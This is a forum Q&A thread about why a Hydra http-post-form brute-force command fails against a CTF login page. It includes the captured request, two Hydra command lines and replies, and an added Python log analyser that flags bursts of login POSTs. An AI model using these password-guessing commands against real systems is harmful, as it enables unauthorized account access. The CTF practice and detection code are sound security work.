3

I am doing some CTF and stumbled upon a problem with Hydra when trying to use it towards a POST request. I already know how to solve this, but I am having trouble with Hydra.

Intercepted from Burp:

POST /administrator/index.php HTTP/1.1
Host: 10.10.10.126
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.126/administrator/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Connection: close
Cookie: eaa83fe8b963ab08ce9ab7d4a798de05=0mvnlo2q2792fi1rortceo4or3; 2b01af51830ca9615359108de04d9ca1=bpsnvqrm2mf6hc5akvnr8ftdu1
Upgrade-Insecure-Requests: 1

username=admin&passwd=test&option=com_login&task=login&return=aW5kZXgucGhw&71800a4b802098aac7f3bbd7e49a8665=1

I've been googling a lot and tried several different things without success. What I did was the following:

hydra -l jonah -P test.txt 10.10.10.126 http-post-form "/administrator/index.php:username=^USER^&passwd=^PASS^&option=com_login&task=login&return=aW5kZXgucGhw&97f7e29809c1606df34ec3df81b10860=1:S=Warning:H=Cookie: eaa83fe8b963ab08ce9ab7d4a798de05=0mvnlo2q2792fi1rortceo4or3; 2b01af51830ca9615359108de04d9ca1=bpsnvqrm2mf6hc5akvnr8ftdu1"

-j is the correct username and -P test.txt contains the correct password.

Could someone tell me what is wrong with my request, and why it doesn't succeed?

Adam Smooch
tryingsohard

2 Answers

2

There is a bug with version 9.1 of Hydra and it won't send a request if you give it a cookie. 9.1 is the version that is still packaged with Kali, so you need to upgrade your Hydra and it should fix the issue.

Eric Aya
XRBtoTheMOON
0

Try using it like this and replace <IncorrectVerbiage> with something like "invalid password".

hydra -l jonah -P test.txt 10.10.10.126 http-post-form "/administrator/index.php:username=^USER^&passwd=^PASS^&option=com_login&task=login&return=aW5kZXgucGhw&97f7e29809c1606df34ec3df81b10860=1:<IncorrectVerbiage>"
zeze
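
Seen from the server side, a run like the one in the question shows up in the access log as a burst of POSTs to /administrator/index.php from one source. The following is an added example, not part of any post on this page, that flags such bursts with a sliding window; the log lines, addresses, threshold and window length are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/administrator/index.php"  # login endpoint from the captured request
# Leading fields of the Apache/nginx "combined" log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_guessing_sources(lines, max_posts=5, window=timedelta(seconds=60)):
    """Return {ip: peak count} for sources that sent more than max_posts
    login POSTs inside any sliding window of the given length."""
    recent = defaultdict(deque)  # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != LOGIN_PATH:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts that fell out of the window
            q.popleft()
        if len(q) > max_posts:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks

def _line(ip, hhmmss, method="POST", status=303):
    # Builds one constructed log line; date, sizes and status are sample values.
    return (f'{ip} - - [12/Mar/2020:{hhmmss} +0000] "{method} {LOGIN_PATH} HTTP/1.1" '
            f'{status} 512 "http://10.10.10.126{LOGIN_PATH}" "Mozilla/5.0"')

# Constructed sample: one source sends 8 login POSTs in 8 seconds,
# another sends two POSTs several minutes apart (a mistyped password).
SAMPLE = (
    [_line("198.51.100.7", "10:00:00", method="GET", status=200)]
    + [_line("198.51.100.7", f"10:00:{s:02d}") for s in range(1, 9)]
    + [_line("203.0.113.20", "10:05:00"), _line("203.0.113.20", "10:12:30")]
)

if __name__ == "__main__":
    print(find_guessing_sources(SAMPLE))
```
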